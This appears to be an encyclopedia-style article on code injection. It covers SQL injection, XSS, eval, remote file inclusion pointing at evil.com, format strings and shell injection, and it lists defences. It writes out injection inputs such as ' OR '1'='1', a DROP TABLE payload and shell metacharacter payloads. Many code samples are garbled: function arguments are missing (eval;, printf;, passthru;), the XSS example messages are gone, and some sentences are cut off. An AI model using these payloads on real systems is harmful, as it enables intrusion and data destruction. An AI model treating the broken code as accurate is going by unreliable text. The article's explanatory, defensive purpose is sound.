Code injection
Code injection is the exploitation of a computer bug that is caused by processing invalid data. Injection is used by an attacker to introduce code into a vulnerable computer program and change the course of execution. The result of successful code injection can be disastrous, for example by allowing computer worms to propagate.
Code injection vulnerabilities occur when an application sends untrusted data to an interpreter. Injection flaws are most often found in SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP headers, program arguments, etc. Injection flaws tend to be easier to discover when examining source code than via testing. Scanners and fuzzers can help find injection flaws.
Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.
Certain types of code injection are errors in interpretation, giving special meaning to user input. Similar interpretation errors exist outside the world of computer science such as the comedy routine Who's on First?. In the routine, there is a failure to distinguish proper names from regular words. Likewise, in some types of code injection, there is a failure to distinguish user input from system commands.
Code injection techniques are popular in system hacking or cracking to gain information, privilege escalation or unauthorized access to a system. Code injection can be used malevolently for many purposes, including:
- Arbitrarily modifying values in a database through SQL injection. The impact of this can range from website defacement to serious compromise of sensitive data.
- Installing malware or executing malevolent code on a server by injecting server scripting code.
- Privilege escalation to root permissions by exploiting Shell Injection vulnerabilities in a setuid root binary on UNIX, or Local System by exploiting a service on Microsoft Windows.
- Attacking web users with HTML/script injection.
Benign and unintentional use
Code injection may be used with good intentions; for example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without any malicious intent. Code injection could, for example:- Introduce a useful new column that did not appear in the original design of a search results page.
- Offer a new way to filter, order, or group data by using a field not exposed in the default functions of the original design.
- As regards programs like Dropbox, add special parts that could be used to connect to online resources in an offline program.
- Utilize the Linux Dynamic Linker to define a function with the same name as certain libc functions, link that function as a library, and override the use of the libc function.
- What the user may consider a valid input may contain token characters or character strings that have been reserved by the developer to have special meaning.
- The user may submit a malformed file as input that is handled gracefully in one application, but is toxic to the receiving system.
Preventing problems
To prevent code injection problems, utilize secure input and output handling, such as:- Using APIs that, if used properly, are secure against all input characters. Parameterized queries allows for moving user data out of string to be interpreted. Additionally Criteria API and similar APIs move away from the concept of command strings to be created and interpreted.
- Enforcing language separation via a static type system.
- Input validation, such as whitelisting only known good values, this can be done on client side using JavaScript for example or it can be done on the server side which is more secure.
- Input encoding, e.g. escaping dangerous characters. For instance, in PHP, using the
htmlspecialchars
function to escape special characters for safe output of text in HTML, andmysqli::real_escape_string
to isolate data which will be included in an SQL request, to protect against SQL Injection. - Output encoding, i.e. preventing HTML Injection attacks against web site visitors
-
HttpOnly
is a flag for HTTP Cookies that, when set, does not allow client-side script interaction with cookies, thereby preventing certain XSS attacks. - Modular shell disassociation from kernel
- With SQL Injection, one can use parameterized queries, stored procedures, whitelist input validation, and more to help mitigate Code Injection problems.
- Runtime image hash validation – capture a hash of a part or complete image of the executable loaded into memory, and compare it with stored and expected hash.
- NX bit – all user data is stored in a special memory sections that are marked as non-executable. The processor is made aware that no code exists in that part of memory, and refuses to execute anything found in there.
- Canaries – randomly place values in a stack. At runtime, a canary is checked when a function returns. If a canary has been modified, the program stops execution and exits. This occurs on a Stack Overflow Attack.
- Code Pointer Masking – after loading a code pointer into a register, apply a bitmask to the pointer. This effectively restricts the addresses to which the pointer can refer.
Examples
SQL injection
SQL injection takes advantage of the syntax of SQL to inject commands that can read or modify a database, or compromise the meaning of the original query.For example, consider a web page that has two fields to allow users to enter a user name and a password. The code behind the page will generate a SQL query to check the password against the list of user names:
SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'Password'
If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid code in the Password field, then the resulting query will look like this:
SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'password' OR '1'='1'
In the example above, "Password" is assumed to be blank or some innocuous string. "
'1'='1'
" will always be true and many rows will be returned, thereby allowing access.The technique may be refined to allow multiple statements to run, or even to load up and run external programs.
Assume a query with the following format:
SELECT User.UserID
FROM User
WHERE User.UserID = ' " + UserID + " '
AND User.Pwd = ' " + Password + " '
UserID: ';DROP TABLE User; --'
Password: 'OR"='
the query will be parsed to be:
SELECT User.UserID
FROM User
WHERE User.UserID = ;DROP TABLE User; --'AND Pwd = OR"='
The result is that the table
User
will be removed from the database. This occurs because the ;
symbol signifies the end of one command and the start of a new one. --
signifies the start of a comment.Cross-site scripting
Code injection is the malicious injection or introduction of code into an application. Some web servers have a guestbook script, which accepts small messages from users, and typically receives messages such as:However a malicious person may know of a code injection vulnerability in the guestbook, and enters a message such as:
If another user views the page then the injected code will be executed. This code can allow the attacker to impersonate another user. However this same software bug can be accidentally triggered by an unassuming user which will cause the website to display bad HTML code.
HTML and script injection is a popular subject, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or something along such lines is placed into the output HTML, without being checked for HTML code or scripting.
Many of these problems are related to erroneous assumptions of what input data is possible, or the effects of special data.
Dynamic evaluation vulnerabilities
Ancall.
$myvar = 'somevalue';
$x = $_GET;
eval;
The argument of "
eval
" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "/bin/echo
".Object injection
allows serialization and deserialization of whole objects. If untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks. Such an attack on Joomla was found in 2013.Remote file injection
Consider this PHP program :$color = 'blue';
if
$color = $_GET;
require;
The example might be read as only color-files like
blue.php
and red.php
could be loaded, while attackers might provide COLOR=http://evil.com/exploit
causing PHP to load the external file.Format specifier injection
Format string bugs most commonly appear when a programmer wishes to print a string containing user supplied data. The programmer may mistakenly writeprintf
instead of printf
. The first version interprets buffer
as a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended.Consider the following short C program that has a local variable char array
password
which holds a password; the program asks the user for an integer and a string, then echoes out the user-provided string.char user_input;
int int_in;
char password = "Password1";
printf;
scanf;
printf;
fgets;
printf;//Safe version is: printf;
printf;
return 0;
%s%s%s%s%s%s%s%s
, then printf
will start reading from the stack. Eventually, one of the %s
format specifier will access the address of password
, which is on the stack, and print Password1
to the screen.Shell injection
Shell injection is named after Unix shells, but applies to most systems which allow software to programmatically execute a command line. Here is an example vulnerable tcsh script:- !/bin/tcsh
- check arg outputs it matches if arg is one
If the above is stored in the executable file
./check
, the shell command ./check " 1 ) evil"
will attempt to execute the injected shell command evil
instead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter in order to defend against an attack.Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these are ,
StartProcess
, and .Client-server systems such as web browser interaction with web servers are potentially vulnerable to shell injection. Consider the following short PHP program that can run on a web server to run an external program called
funnytext
to replace a word the user sent with some other word.passthru;
?>
The
passthru
in the above composes a shell command that is then executed by the web server. Since part of the command it composes is taken from the URL provided by the web browser, this allows the URL to inject malicious shell commands. One can inject code into this program in several ways by exploiting the syntax of various shell features :Shell feature | USER_INPUT value | Resulting shell command | Explanation |
Sequential execution | ; malicious_command | /bin/funnytext ; malicious_command | Executes funnytext , then executes malicious_command . |
Pipelines | | malicious_command | /bin/funnytext | malicious_command | Sends the output of funnytext as input to malicious_command . |
Command substitution | `malicious_command` | /bin/funnytext `malicious_command` | Sends the output of malicious_command as arguments to funnytext . |
Command substitution | $ | /bin/funnytext $ | Sends the output of malicious_command as arguments to funnytext . |
AND list | && malicious_command | /bin/funnytext && malicious_command | Executes malicious_command iff funnytext returns an exit status of 0. |
OR list | || malicious_command | /bin/funnytext || malicious_command | Executes malicious_command iff funnytext returns a nonzero exit status. |
Output redirection | > ~/.bashrc | /bin/funnytext > ~/.bashrc | Overwrites the contents the .bashrc file with the output of funnytext . |
Input redirection | < ~/.bashrc | /bin/funnytext < ~/.bashrc | Sends the contents of the .bashrc file as input to funnytext . |
Some languages offer functions to properly escape or quote strings that are used to construct shell commands:
- PHP:
and
- Python:
A safer alternative is to use APIs that execute external programs directly, rather than through a shell, thus preventing the possibility of shell injection. However, these APIs tend to not support various convenience features of shells, and/or to be more cumbersome/verbose compared to concise shell-syntax.